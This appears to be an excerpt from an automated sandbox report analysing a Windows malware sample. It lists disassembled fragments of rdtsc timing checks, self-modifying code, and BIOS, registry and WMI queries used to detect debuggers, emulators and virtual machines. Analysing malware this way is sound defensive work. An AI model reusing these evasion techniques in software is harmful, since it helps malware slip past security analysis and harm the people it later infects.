Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 549090C second address: 5490920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, si 0x0000000f mov ax, E94Bh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490920 second address: 5490926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490926 second address: 5480011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007FF628D73F5Fh 0x0000000e retn 0004h 0x00000011 nop 0x00000012 cmp eax, 00000000h 0x00000015 setne al 0x00000018 jmp 00007FF628D73F52h 0x0000001a xor ebx, ebx 0x0000001c test al, 01h 0x0000001e jne 00007FF628D73F57h 0x00000020 sub esp, 04h 0x00000023 mov dword ptr [esp], 0000000Dh 0x0000002a call 00007FF62DC5154Bh 0x0000002f mov edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF628D73F5Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480011 second address: 5480021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628B6958Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480021 second address: 5480071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d mov esi, edx 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007FF628D73F61h 0x00000018 mov ebp, esp 0x0000001a jmp 00007FF628D73F5Eh 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF628D73F67h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480071 second address: 54800ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, 8B37h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF628B69598h 0x00000014 pop ecx 0x00000015 call 00007FF628B69597h 0x0000001a mov si, F6FFh 0x0000001e pop ecx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FF628B69590h 0x00000028 jmp 00007FF628B69595h 0x0000002d popfd 0x0000002e push ecx 0x0000002f mov di, 1FE2h 0x00000033 pop edx 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54800ED second address: 54800F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54800F1 second address: 548010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548010C second address: 5480157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628D73F5Fh 0x00000009 and esi, 354E6E3Eh 0x0000000f jmp 00007FF628D73F69h 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF628D73F5Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480157 second address: 548015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548015D second address: 5480161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480197 second address: 54801BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628B69592h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54801BC second address: 5480217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 16209C04h 0x00000008 pushfd 0x00000009 jmp 00007FF628D73F5Dh 0x0000000e or ecx, 210EE746h 0x00000014 jmp 00007FF628D73F61h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d inc ebx 0x0000001e jmp 00007FF628D73F5Eh 0x00000023 test al, al 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF628D73F67h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480217 second address: 548023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF628B697A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF628B69593h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548023A second address: 5480260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480260 second address: 5480264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480264 second address: 548026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548026A second address: 5480270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54802E6 second address: 54802EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54802EB second address: 548030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 6A9A0228h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF628B69593h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548030D second address: 5480313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480313 second address: 5480350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF628B69598h 0x00000014 add eax, 1EB216E8h 0x0000001a jmp 00007FF628B6958Bh 0x0000001f popfd 0x00000020 movzx ecx, di 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480350 second address: 5480356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480356 second address: 548035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548035A second address: 548035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548039F second address: 54803A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803A5 second address: 54803A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803A9 second address: 54803C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FF698AD7661h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF628B6958Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803C3 second address: 54803D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803D5 second address: 54803D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803D9 second address: 54803F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF628D73FB7h 0x0000000e pushad 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 cmp dword ptr [ebp-14h], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803F5 second address: 54803F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803F9 second address: 54803FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54803FF second address: 548042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF698AD760Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628B69590h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548042C second address: 5480432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480432 second address: 5480438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480438 second address: 548043C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548043C second address: 5480440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480440 second address: 54804AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007FF628D73F64h 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 pushad 0x00000014 call 00007FF628D73F5Eh 0x00000019 movzx eax, di 0x0000001c pop edi 0x0000001d popad 0x0000001e push ebp 0x0000001f jmp 00007FF628D73F66h 0x00000024 mov dword ptr [esp], esi 0x00000027 jmp 00007FF628D73F60h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FF628D73F5Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54804AF second address: 54804B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54804B3 second address: 54804B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54804B9 second address: 54804D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54804D2 second address: 54804D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54804D8 second address: 5480516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BEh 0x00000005 pushfd 0x00000006 jmp 00007FF628B6958Eh 0x0000000b adc cl, FFFFFFD8h 0x0000000e jmp 00007FF628B6958Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF628B69595h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480568 second address: 548057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, dh 0x0000000e mov eax, 3DB9AA35h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548057C second address: 5470D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF628B69594h 0x00000012 adc ah, FFFFFFB8h 0x00000015 jmp 00007FF628B6958Bh 0x0000001a popfd 0x0000001b mov dl, ah 0x0000001d popad 0x0000001e je 00007FF698AD7626h 0x00000024 xor eax, eax 0x00000026 jmp 00007FF628B42CBAh 0x0000002b pop esi 0x0000002c pop edi 0x0000002d pop ebx 0x0000002e leave 0x0000002f retn 0004h 0x00000032 nop 0x00000033 xor ebx, ebx 0x00000035 cmp eax, 00000000h 0x00000038 je 00007FF628B696E3h 0x0000003e call 00007FF62DA3775Fh 0x00000043 mov edi, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov al, F6h 0x0000004a mov bh, EFh 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5470D5C second address: 5470D8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF628D73F5Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, BDE3h 0x00000017 mov edi, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5470D8F second address: 5470DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 77CF7A36h 0x00000008 mov eax, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, EFh 0x00000013 pushfd 0x00000014 jmp 00007FF628B69597h 0x00000019 xor ch, 0000006Eh 0x0000001c jmp 00007FF628B69599h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5470DD8 second address: 5470EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628D73F67h 0x00000009 and ch, 0000007Eh 0x0000000c jmp 00007FF628D73F69h 0x00000011 popfd 0x00000012 call 00007FF628D73F60h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push ebx 0x0000001f jmp 00007FF628D73F5Ah 0x00000024 pop eax 0x00000025 mov cx, bx 0x00000028 popad 0x00000029 push esi 0x0000002a jmp 00007FF628D73F5Ah 0x0000002f mov dword ptr [esp], ecx 0x00000032 jmp 00007FF628D73F60h 0x00000037 mov dword ptr [ebp-04h], 55534552h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FF628D73F5Eh 0x00000045 adc ecx, 55EE0D38h 0x0000004b jmp 00007FF628D73F5Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007FF628D73F66h 0x00000059 sbb eax, 12388798h 0x0000005f jmp 00007FF628D73F5Bh 0x00000064 popfd 0x00000065 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548092E second address: 5480934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480934 second address: 5480938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480938 second address: 548093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 548093C second address: 54809C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF628D73F5Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FF628D73F5Eh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007FF628D73F5Eh 0x0000001c pushfd 0x0000001d jmp 00007FF628D73F62h 0x00000022 and al, 00000048h 0x00000025 jmp 00007FF628D73F5Bh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c push edx 0x0000002d jmp 00007FF628D73F64h 0x00000032 pop eax 0x00000033 popad 0x00000034 cmp dword ptr [7544459Ch], 05h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF628D73F5Ch 0x00000042 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54809C1 second address: 5480A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF628B69591h 0x00000009 xor ecx, 5D46AEC6h 0x0000000f jmp 00007FF628B69591h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF628B69590h 0x0000001b sub ecx, 4A3B9F68h 0x00000021 jmp 00007FF628B6958Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a je 00007FF698AC7571h 0x00000030 jmp 00007FF628B69596h 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF628B69597h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480B7C second address: 5480B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5480B8D second address: 5480BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF628B69593h 0x00000019 jmp 00007FF628B69593h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490974 second address: 5490978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490978 second address: 5490986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490986 second address: 549098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 549098A second address: 5490990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490990 second address: 54909D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF628D73F66h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628D73F67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54909D5 second address: 54909DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 54909DA second address: 5490A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF628D73F65h 0x0000000a or si, 4376h 0x0000000f jmp 00007FF628D73F61h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov si, di 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, ecx 0x00000024 mov edi, ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490A1D second address: 5490A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628B69595h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490A4A second address: 5490AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FF628D73F63h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 jmp 00007FF628D73F5Fh 0x00000015 je 00007FF698CC1896h 0x0000001b pushad 0x0000001c mov si, F21Bh 0x00000020 movzx ecx, bx 0x00000023 popad 0x00000024 cmp dword ptr [7544459Ch], 05h 0x0000002b pushad 0x0000002c mov edi, 0EFFB6FCh 0x00000031 pushad 0x00000032 push ebx 0x00000033 pop esi 0x00000034 mov cx, bx 0x00000037 popad 0x00000038 popad 0x00000039 je 00007FF698CD9952h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov edi, eax 0x00000044 push ecx 0x00000045 pop edi 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490AA9 second address: 5490AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FF628B69596h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628B69597h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490C22 second address: 5490C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5490C26 second address: 5490C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Special instruction interceptor: First address: 5C7F6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Special instruction interceptor: First address: 7743C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Special instruction interceptor: First address: 7746FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Special instruction interceptor: First address: 78676E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe TID: 8004	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe TID: 7892	Thread sleep time: -34017s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

